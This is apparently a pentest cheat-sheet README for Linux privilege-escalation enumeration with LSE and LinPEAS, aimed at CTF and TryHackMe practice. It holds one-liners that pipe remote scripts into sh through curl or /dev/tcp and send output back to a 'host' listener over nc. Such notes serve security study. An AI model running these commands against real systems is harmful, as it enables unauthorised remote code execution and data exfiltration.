Awesome
<div align="center"> <h2 align="center"><a href="https://github.com/Anlominus">⚜️ Aภl๏miuภuຮ ⚜️</a></h2> <img align="center" width="100" src="https://user-images.githubusercontent.com/51442719/172729066-1293d382-4a31-4f03-8c23-ab0ea5f611a0.png">בס״ד
⫷ HacKingPro ⫸
<br>
⫷ TryHackMe | KoTH ⫸
<br>
⫷ Privilege-Escalation⫸
<br>
⫷ ScanPro | Linfo | Diablo ⫸
<br>
⫷ Offensive-Security | PenTest ⫸
<br>
⫷ Goals | Studies | HacKing | AnyTeam ⫸
<br>
<div align="center">
Privilege-Escalation ~> Linux-PrivEsc
Tools | Cheat Sheets | Notes | Checklists
Linux Enumeration
LSE
wget https://raw.githubusercontent.com/Anlominus/HacKingPro/main/Menu/14--Privilege%20Enumeration%20%26%20Escalation/lse.sh; chmod 777 lse.sh
LinPEAS
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh; chmod 777 linpeas.sh
</div>
LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix*/MacOS hosts. The checks are explained on book.hacktricks.xyz
# From github curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Local network sudo python -m SimpleHTTPServer 80 #Host curl 10.10.10.10/linpeas.sh | sh #Victim # Without curl sudo nc -q 5 -lvnp 80 < linpeas.sh #Host cat < /dev/tcp/10.10.10.10/80 | sh #Victim # Excute from memory and send output back to the host nc -lvnp 9002 | tee linpeas.out #Host curl 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002 #Victim
# Output to file ./linpeas.sh -a > /dev/shm/linpeas.txt #Victim less -r /dev/shm/linpeas.txt #Read with colors
</div># Use a linpeas binary wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas_linux_amd64 chmod +x linpeas_linux_amd64 ./linpeas_linux_amd64